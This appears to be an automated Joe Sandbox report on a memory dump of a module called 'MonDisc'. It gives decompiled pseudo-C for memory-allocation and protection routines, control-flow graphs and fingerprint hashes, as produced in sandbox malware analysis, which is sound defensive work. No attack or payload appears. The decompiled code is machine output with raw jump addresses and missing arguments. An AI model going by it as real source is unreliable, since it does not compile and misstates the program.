                              				void* _t149;
                              				signed long long _t151;
                              				void* _t152;
                              				signed long long _t154;
                              
                              				 *((long long*)(_t133 + 8)) = __rbx;
                              				 *((long long*)(_t133 + 0x10)) = _t129;
                              				 *((long long*)(_t133 + 0x18)) = __rsi;
                              				 *((long long*)(_t133 + 0x20)) = __rdi;
                              				r14d = 0;
                              				if (__rdx - 0x20000 < 0) goto 0x2c9142fd;
                              				_t151 = __rdx + 0x00020036 & 0xfffe0000;
                              				if (_t151 - __rdx <= 0) goto 0x2c9142fd;
                              				GetLastError();
                              				r9d = 4;
                              				r8d = 0x103000;
                              				VirtualAlloc(_t149, _t146);
                              				SetLastError(_t142);
                              				_t102 =  !=  ? __rax : 0xffffffff;
                              				if (0xffffffff == 0xffffffff) goto 0x2c9142fd;
                              				if (0xffffffff != 0xffffffff) goto 0x2c9142c3;
                              				goto 0x2c9142c9;
                              				_t103 = ( !=  ? __rax : 0xffffffff) + 0xffffffff;
                              				_t152 = _t151 - 0xffffffff;
                              				 *0xffffffff = 0xbadbad;
                              				 *0x00000007 = _t152 - 0x00000020 | 0x00000002;
                              				_t9 = _t103 + 0x10; // 0x10000000f
                              				_t87 = _t9;
                              				 *((long long*)(0xffffffff + _t152 - 0x18)) = 0xb;
                              				 *(( !=  ? __rax : 0xffffffff) + 0xffffffff + _t152 - 0x10) = _t146;
                              				if (_t87 != 0) goto 0x2c91445d;
                              				_t154 = __rdx + 0x00020040 & 0xfffe0000;
                              				if (_t154 - __rdx <= 0) goto 0x2c91445b;
                              				_t51 = GetLastError();
                              				r9d = 4;
                              				r8d = 0x3000;
                              				_t52 = VirtualAlloc(??, ??, ??, ??); // executed
                              				_t98 = _t87;
                              				SetLastError(??);
                              				_t144 =  !=  ? _t98 : 0xffffffff;
                              				if (0xffffffff == 0xffffffff) goto 0x2c91445b;
                              				_t88 = __rcx + 0x348;
                              				_t104 = _t88;
                              				if (_t88 == 0) goto 0x2c914404;
                              				asm("o16 nop [eax+eax]");
                              				_t139 =  *((intOrPtr*)(_t104 + 8));
                              				_t136 =  *_t104;
                              				_t115 = _t136 + _t139;
                              				if (0xffffffff == _t115) goto 0x2c91438b;
                              				_t105 =  *((intOrPtr*)(_t104 + 0x10));
                              				if (_t105 != 0) goto 0x2c914370;
                              				goto 0x2c9143ef;
                              				_t141 =  *((intOrPtr*)(__rcx + 0x20));
                              				if (_t141 - _t136 < 0) goto 0x2c9143ea;
                              				_t75 = _t141 - _t115;
                              				if (_t75 >= 0) goto 0x2c9143ea;
                              				 *((long long*)(_t105 + 8)) = _t139 + _t154;
                              				if (_t75 == 0) goto 0x2c9143be;
                              				r14d = _t52 & 0x00000007;
                              				_t147 =  ~_t146;
                              				r14d = r14d & 0x00000007;
                              				_t118 =  *(__rcx + 0x10) + _t154 - _t147;
                              				_t107 =  *((intOrPtr*)(__rcx + 0x20)) + _t147;
                              				 *((long long*)(__rcx + 0x20)) = _t107;
                              				 *(__rcx + 0x10) = _t118;
                              				_t92 = _t118 | 0x00000001;
                              				 *(_t107 + 8) = _t92;
                              				 *((long long*)(_t107 + _t118 + 8)) = 0x40;
                              				 *((long long*)(__rcx + 0x28)) = 0x200000;
                              				goto 0x2c914412;
                              				if (_t92 == 0) goto 0x2c914404;
                              				if ( *_t92 == 0xffffffff + _t154) goto 0x2c914444;
                              				if ( *((intOrPtr*)(_t92 + 0x10)) != 0) goto 0x2c9143f3;
                              				_t54 = E00007FF67FF62C913F80(_t52 & 0x00000007, _t51, _t98, __rcx, 0xffffffff, __rdi, __rcx, __rdx, _t154);
                              				_t120 =  *(__rcx + 0x10);
                              				if (__rdx - _t120 >= 0) goto 0x2c91445b;
                              				_t110 =  *((intOrPtr*)(__rcx + 0x20));
                              				_t121 = _t120 - __rdx;
                              				 *(__rcx + 0x10) = _t121;
                              				_t94 = _t110 + __rdx;
                              				 *((long long*)(__rcx + 0x20)) = _t94;
                              				 *(_t94 + 8) = _t121 | 0x00000001;
                              				_t95 = _t110 + 0x10;
                              				 *(_t110 + 8) = __rdx | 0x00000003;
                              				goto 0x2c91445d;
                              				 *((intOrPtr*)(_t95 + 8)) =  *((intOrPtr*)(_t95 + 8)) + _t154;
                              				 *_t95 =  !=  ? _t98 : 0xffffffff;
                              				E00007FF67FF62C915690(_t54, __rdx - _t120, __rcx, 0xffffffff, _t154, __rdx | 0x00000003);
                              				goto 0x2c91445d;
                              				return 0;
                              			}


































                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast$AllocVirtual
                              • String ID:
                              • API String ID: 1225938287-0
                              • Opcode ID: 1f8f53a2a8f1067a6d9ce8600932e85ee154f6131d0fcfe8c50b931226d781b0
                              • Instruction ID: 11ca606a2b89079650a6a545d82144bd12ba7e94f9946d88472e9e1ee43a09ca
                              • Opcode Fuzzy Hash: 1f8f53a2a8f1067a6d9ce8600932e85ee154f6131d0fcfe8c50b931226d781b0
                              • Instruction Fuzzy Hash: AB51B372B09B8182EE24CB19E84537972A8FB49BA4F584A35CA6E877D1DF7CD442C301
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6724 7ff62c93b4f0-7ff62c93b503 6725 7ff62c93b57e-7ff62c93b588 6724->6725 6726 7ff62c93b505-7ff62c93b50f 6724->6726 6729 7ff62c93b58a-7ff62c93b598 6725->6729 6730 7ff62c93b5d3-7ff62c93b5d9 6725->6730 6727 7ff62c93b551-7ff62c93b56b VirtualProtect 6726->6727 6728 7ff62c93b511-7ff62c93b518 6726->6728 6733 7ff62c93b571-7ff62c93b57d 6727->6733 6734 7ff62c93b600-7ff62c93b608 call 7ff62c93b9d0 6727->6734 6732 7ff62c93b51a-7ff62c93b534 VirtualProtect 6728->6732 6728->6733 6729->6730 6735 7ff62c93b59a-7ff62c93b5a1 6729->6735 6730->6730 6731 7ff62c93b5db-7ff62c93b5e6 6730->6731 6731->6730 6736 7ff62c93b5e8-7ff62c93b5fe VirtualProtect 6731->6736 6732->6734 6738 7ff62c93b53a-7ff62c93b550 6732->6738 6739 7ff62c93b5c5-7ff62c93b5d2 6735->6739 6740 7ff62c93b5a3-7ff62c93b5b9 VirtualProtect 6735->6740 6736->6734 6736->6739 6740->6734 6741 7ff62c93b5bb 6740->6741 6741->6739
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: e4865afb915496471d6bbcdb1aef419896af53439b49253e0173317b4e702b01
                              • Instruction ID: 0d8cc644f4d458320fa0c555a007c9d90534fc4d1b70c6243e90ab8fc1409a19
                              • Opcode Fuzzy Hash: e4865afb915496471d6bbcdb1aef419896af53439b49253e0173317b4e702b01
                              • Instruction Fuzzy Hash: 45218F62F1C98681EF54DF26E8447E92360FB04B98F480036CB0D87656DF79D994C701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6743 7ff62c914ac0-7ff62c914ad0 6744 7ff62c914ad6-7ff62c914ae0 6743->6744 6745 7ff62c914b79-7ff62c914b7e 6743->6745 6746 7ff62c914ae5-7ff62c914afb GetLastError 6744->6746 6747 7ff62c914b59-7ff62c914b5b SetLastError 6746->6747 6748 7ff62c914afd 6746->6748 6749 7ff62c914b61-7ff62c914b64 6747->6749 6750 7ff62c914b00-7ff62c914b17 VirtualQuery 6748->6750 6749->6746 6751 7ff62c914b6a-7ff62c914b74 6749->6751 6750->6749 6752 7ff62c914b19-7ff62c914b1e 6750->6752 6751->6745 6752->6749 6753 7ff62c914b20-7ff62c914b25 6752->6753 6753->6749 6754 7ff62c914b27-7ff62c914b2f 6753->6754 6754->6749 6755 7ff62c914b31-7ff62c914b36 6754->6755 6755->6749 6756 7ff62c914b38-7ff62c914b4b VirtualFree 6755->6756 6756->6749 6757 7ff62c914b4d-7ff62c914b57 6756->6757 6757->6747 6757->6750
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLastVirtual$FreeQuery
                              • String ID:
                              • API String ID: 2187276999-0
                              • Opcode ID: 20c87b9970e1333da46833e6f9bdc2643c7eabd298e1a4bb3600f4f4c70c1e47
                              • Instruction ID: 03c873749e82fd4813b673589fe114e3785e648865514e48ee6eddcc99b3694b
                              • Opcode Fuzzy Hash: 20c87b9970e1333da46833e6f9bdc2643c7eabd298e1a4bb3600f4f4c70c1e47
                              • Instruction Fuzzy Hash: 58116D31E48B8182EF619F15B80132DB3A8FB89BA1F480035EA8D97B59CF7CE541CB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
                              • String ID: CCG $csm
                              • API String ID: 3115360832-2763669848
                              • Opcode ID: e1f5c2b70966fd4569ac91c2244ea77c1fdfe1cb53358e8faaeeadb4bbb39fb4
                              • Instruction ID: ffe2a00263b1d474027954ae1cabb6c005b3f42586d3212f8becede02d996e0a
                              • Opcode Fuzzy Hash: e1f5c2b70966fd4569ac91c2244ea77c1fdfe1cb53358e8faaeeadb4bbb39fb4
                              • Instruction Fuzzy Hash: ED41DE22F08B4582EE249B16EC0537A67A1FB44FF4F544132EE5D87BAADE3CE4418742
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E00007FF67FF62C914990(void* __esi, signed long long __rax, long long __rbx, void* __rcx, long long __rsi) {
                              				void* _t23;
                              				void* _t24;
                              				signed int _t25;
                              				signed long long _t46;
                              				signed long long _t47;
                              				void* _t49;
                              				void* _t56;
                              				void* _t58;
                              				long long _t59;
                              				long _t60;
                              				void* _t62;
                              				long long _t71;
                              				void* _t73;
                              				void* _t75;
                              				void* _t76;
                              				void* _t78;
                              
                              				_t49 = __rcx;
                              				 *((long long*)(_t75 + 0x18)) = __rbx;
                              				_t76 = _t75 - 0x20;
                              				GetLastError();
                              				r8d = 0x3000;
                              				_t2 = _t49 + 4; // 0x4, executed
                              				r9d = _t2;
                              				_t23 = VirtualAlloc(??, ??, ??, ??); // executed
                              				_t46 = __rax;
                              				SetLastError(_t60);
                              				_t62 =  !=  ? __rax : 0xffffffff;
                              				if (0xffffffff == 0xffffffff) goto 0x2c914aa7;
                              				 *((long long*)(_t76 + 0x30)) = _t71;
                              				 *((long long*)(_t76 + 0x38)) = __rsi;
                              				if (0xffffffff != 0xffffffff) goto 0x2c9149f4;
                              				goto 0x2c9149fa;
                              				_t5 = _t62 + 0x10; // 0x10000000f
                              				_t73 = _t5 + 0xffffffff;
                              				r8d = 0x370;
                              				_t24 = E00007FF67FF62C974DE0(_t23, 0, _t73, _t56, _t78);
                              				 *0x00BADBB4 = 0x373;
                              				 *((long long*)(_t73 + 0x348)) = 0xffffffff;
                              				 *((long long*)(_t73 + 0x350)) = 0x20000;
                              				 *((long long*)(_t73 + 0x30)) = 0xff;
                              				_t25 = E00007FF67FF62C914770(_t24, _t73);
                              				_t12 = _t73 - 0x10; // 0xffffffff
                              				_t58 = _t12 + ( *(_t73 - 8) & 0xfffffffc);
                              				if (0xffffffff == 0xffffffff) goto 0x2c914a6a;
                              				_t47 =  ~_t46;
                              				_t59 = _t58 + _t47;
                              				 *((long long*)(_t73 + 0x20)) = _t59;
                              				 *((long long*)(_t73 + 0x10)) = 0xffffffff;
                              				 *((long long*)(_t59 + 8)) = 0xffffffffffffffff;
                              				 *((long long*)(_t59 + _t62 - _t58 + 0x1ffc0 - _t47 + 8)) = 0x40;
                              				 *((long long*)(_t73 + 0x28)) = 0x200000;
                              				return _t25 & 0x00000007;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast$AllocVirtual
                              • String ID:
                              • API String ID: 1225938287-0
                              • Opcode ID: f9c01e8079d133bec8a0bf8e62291096fc8cae84ce67d04018067ad811153b0a
                              • Instruction ID: c175c5e3c6a898471cc0f5b104a3f4c4e37390bca64c5593f9fd4b382e3d1c30
                              • Opcode Fuzzy Hash: f9c01e8079d133bec8a0bf8e62291096fc8cae84ce67d04018067ad811153b0a
                              • Instruction Fuzzy Hash: 3721C072F14A8086EB148F25ED8436972A5EB49BB8F584334DA7D4BADACF3CD5458300
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-3916222277
                              • Opcode ID: dc9e0bc24b8a14b25f42cd3fce6812904afc7f3a83e5f824c8b073630af0a366
                              • Instruction ID: 7aec3f18a195a2b40e727c9c8446921766dd0cca911e7c1735d3c8251c9f1dcf
                              • Opcode Fuzzy Hash: dc9e0bc24b8a14b25f42cd3fce6812904afc7f3a83e5f824c8b073630af0a366
                              • Instruction Fuzzy Hash: 36E0ED61E1A59681FF589F62D8587F82250EB54B58F0C1036D91D8B686CF38D5858711
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-3916222277
                              • Opcode ID: bd5762d522cc1c6c6a376013eaf042b8cddcb8530fa961075b392e24916f12f7
                              • Instruction ID: 911960bf5f3841d46f036ad3088780c6cb09b86980ab0f570b5e04740f628160
                              • Opcode Fuzzy Hash: bd5762d522cc1c6c6a376013eaf042b8cddcb8530fa961075b392e24916f12f7
                              • Instruction Fuzzy Hash: 68E09261E1A68681EF14DB62E8587EC3390EB14B5CF1C0036DA1C4B752CF39C0828701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00007FF67FF62C8FF020(void* __edi, intOrPtr* __rax, signed long long __rcx, signed int __rdx, long long __rdi, long long __rsi, long long __r14, long long __r15) {
                              				void* _t60;
                              				signed int _t65;
                              				void* _t76;
                              				intOrPtr* _t109;
                              				signed long long _t111;
                              				signed long long _t114;
                              				intOrPtr _t115;
                              				long long _t125;
                              				void* _t131;
                              				long long _t139;
                              				signed long long _t141;
                              				void* _t143;
                              				void* _t145;
                              				intOrPtr _t148;
                              
                              				 *((long long*)(_t143 + 0x50)) = _t139;
                              				_t111 = __rcx;
                              				 *((long long*)(_t143 + 0x58)) = __rsi;
                              				 *((long long*)(_t143 + 0x60)) = __rdi;
                              				 *((long long*)(_t143 + 0x28)) = __r14;
                              				 *((long long*)(_t143 + 0x20)) = __r15;
                              				E00007FF67FF62C984D84(__rax);
                              				r12d =  *__rax;
                              				r13d = GetLastError();
                              				_t148 =  *((intOrPtr*)(__rcx + 0x10));
                              				_t114 =  *( *((intOrPtr*)(__rcx + 0x20)) - 0x10) & 0xffffffff;
                              				_t145 = _t148 + 0x2d8;
                              				if ( *((char*)(_t114 + 0xa)) != 0) goto 0x2c8ff0ca;
                              				_t115 =  *((intOrPtr*)(_t114 + 0x20));
                              				if (( *(_t115 - 0x2b) & 0x00000002) == 0) goto 0x2c8ff0a4;
                              				if ( *((intOrPtr*)(__rcx + 0x30)) -  *(__rcx + 0x28) -  *(__rcx + 0x28) << 3 > 0) goto 0x2c8ff0be;
                              				E00007FF67FF62C8FB470(( *(_t115 - 0x5d) & 0x000000ff) + 1 + __edi, __rcx);
                              				_t76 =  >=  ? ( *(_t115 - 0x5e) & 0x000000ff) - __edi : 0;
                              				goto 0x2c8ff0e9;
                              				if ( *((intOrPtr*)(_t111 + 0x30)) -  *((intOrPtr*)(_t111 + 0x28)) - 0xa0 > 0) goto 0x2c8ff0e7;
                              				E00007FF67FF62C8FB470(0x14, _t111);
                              				 *(_t145 + 0x80) = _t111;
                              				if ((bpl & 0x00000001) == 0) goto 0x2c8ff111;
                              				_t141 = __rdx & 0xfffffffe;
                              				0x2c910630();
                              				goto 0x2c8ff1a6;
                              				if ( *((intOrPtr*)(_t145 + 0xec)) == 0) goto 0x2c8ff131;
                              				if (( *(_t148 + 0x91) & 0x00000060) != 0) goto 0x2c8ff131;
                              				_t131 = _t141 - 4;
                              				_t60 = E00007FF67FF62C910750(_t145, _t131); // executed
                              				if (( *(_t148 + 0x91) & 0x00000001) == 0) goto 0x2c8ff1a6;
                              				if (0 <= 0) goto 0x2c8ff166;
                              				 *((long long*)( *((intOrPtr*)(_t111 + 0x28)))) = 0xffffffff;
                              				 *((long long*)(_t111 + 0x28)) =  *((long long*)(_t111 + 0x28)) + 8;
                              				if (0 != 0) goto 0x2c8ff150;
                              				_t37 = _t131 - 1; // -1
                              				r8d = _t37;
                              				E00007FF67FF62C8FEEA0(_t60, 0, _t111);
                              				if (0 <= 0) goto 0x2c8ff1a6;
                              				_t125 =  *((intOrPtr*)(_t111 + 0x28)) + 0xfffffff8;
                              				if ( *_t125 != 0xffffffff) goto 0x2c8ff1a6;
                              				 *((long long*)(_t111 + 0x28)) = _t125;
                              				_t109 = _t145 + 0xec;
                              				if (0xffffffffffffffff > 0) goto 0x2c8ff180;
                              				_t65 =  *(_t141 - 4) & 0x000000ff;
                              				if (( *(_t145 + 0xa8) & 0x00000001) == 0) goto 0x2c8ff1d4;
                              				if ( *_t109 == 0) goto 0x2c8ff1e0;
                              				if (_t65 == 0x59) goto 0x2c8ff1de;
                              				if (_t65 != 0x5c) goto 0x2c8ff1e0;
                              				E00007FF67FF62C984D84(_t109);
                              				 *_t109 = r12d;
                              				SetLastError(??);
                              				return  *(0x2ca0b8a0 + _t111 * 2) & 0x0000ffff;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: e80b2bc9db974d49542e4d1372fe8b582b24f3e5b18ddff23404600a2fe7202b
                              • Instruction ID: 6377bbac4fb2feea6185983420b7a21036aba470e4217bb156411cb714e5462a
                              • Opcode Fuzzy Hash: e80b2bc9db974d49542e4d1372fe8b582b24f3e5b18ddff23404600a2fe7202b
                              • Instruction Fuzzy Hash: 15517F32A08A8189EB11CB29D84477967A4FB84BB8F958332DE6D833D5DF3ED845C701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E00007FF67FF62C93B7F0(long long* __rax, long long __rbx, void* __rcx, long long __rsi) {
                              				int _t24;
                              				signed int _t25;
                              				void* _t27;
                              				long long* _t37;
                              				signed long long _t45;
                              				void* _t63;
                              				long long _t68;
                              				void* _t72;
                              				long long* _t75;
                              				long _t76;
                              				void* _t78;
                              				long long _t79;
                              
                              				_t37 = __rax;
                              				 *((long long*)(_t72 + 0x10)) = __rbx;
                              				 *((long long*)(_t72 + 0x18)) = _t68;
                              				 *((long long*)(_t72 + 0x20)) = __rsi;
                              				_t79 =  *((intOrPtr*)(__rcx + 0xbe8));
                              				_t45 =  *((intOrPtr*)(__rcx + 0x694)) + 0x00000003 << 0x0000000a & 0xfffff000;
                              				r14d = 0;
                              				_t50 =  ==  ? _t76 : _t79 - _t45;
                              				_t30 =  ==  ? _t76 : _t79 - _t45;
                              				if (( ==  ? _t76 : _t79 - _t45) == 0) goto 0x2c93b8a0;
                              				r9d = 4;
                              				r8d = 0x103000;
                              				VirtualAlloc(_t78, _t76); // executed
                              				_t75 = __rax;
                              				if (__rax == 0) goto 0x2c93b8a0;
                              				if (__rax - 0x7ff62c8f4bb6 + _t45 - 0x3fe00000 < 0) goto 0x2c93b8d6;
                              				if (0x7ff62c8f4bb6 - __rax - 0x3fe00000 < 0) goto 0x2c93b8d6;
                              				r8d = 0x8000;
                              				_t24 = VirtualFree(_t63, ??);
                              				asm("o16 nop [eax+eax]");
                              				_t25 = E00007FF67FF62C912230(_t24, _t27, __rcx - 0x150);
                              				if (_t37 + _t45 - 0x7fc00000 >= 0) goto 0x2c93b8a0;
                              				r14d = r14d + 1;
                              				if (r14d - 0x1f >= 0) goto 0x2c93b934;
                              				goto 0x2c93b846;
                              				 *((long long*)(__rcx + 0xbe8)) = _t75;
                              				 *((long long*)(__rcx + 0xbf0)) = _t37 + _t45;
                              				_t14 = _t75 + 0x10; // 0x10
                              				 *(__rcx + 0xc00) = _t45;
                              				 *((long long*)(__rcx + 0xbf8)) = _t14;
                              				 *((intOrPtr*)(__rcx + 0xbe4)) = 4;
                              				 *_t75 = _t79;
                              				 *( *((intOrPtr*)(__rcx + 0xbe8)) + 8) = _t45;
                              				 *((intOrPtr*)(__rcx + 0xc08)) =  *((intOrPtr*)(__rcx + 0xc08)) + _t45;
                              				return _t25 & 0x7fff0000;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 0f7646565ba74cff3643f04de9dfd9104d266136aced4bd7108743d174fba979
                              • Instruction ID: 49213d4773f531b0bd14cfebaf175c4abf7a3543b1691214cf5ab5318fabaa5f
                              • Opcode Fuzzy Hash: 0f7646565ba74cff3643f04de9dfd9104d266136aced4bd7108743d174fba979
                              • Instruction Fuzzy Hash: C031C022F18A8682EE18DF21E8143BA7764FB84BA8F584631CF6E43795DF3CD1428305
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 15%
                              			E00007FF67FF62C984AF0(void* __ecx, long long __rbx, signed int __rdx, long long __rdi, long long __r14, long long _a8, long long _a16, long long _a24) {
                              				signed long long _v24;
                              				int _t20;
                              				void* _t28;
                              				void* _t41;
                              				void* _t43;
                              				void* _t51;
                              				void* _t62;
                              				signed int* _t64;
                              				signed long long _t65;
                              				void* _t66;
                              				void* _t67;
                              				void* _t68;
                              				intOrPtr* _t69;
                              				signed long long _t73;
                              				void* _t76;
                              				intOrPtr _t77;
                              				void* _t79;
                              				signed long long* _t84;
                              				void* _t88;
                              				signed long long _t92;
                              				intOrPtr _t94;
                              				signed long long _t95;
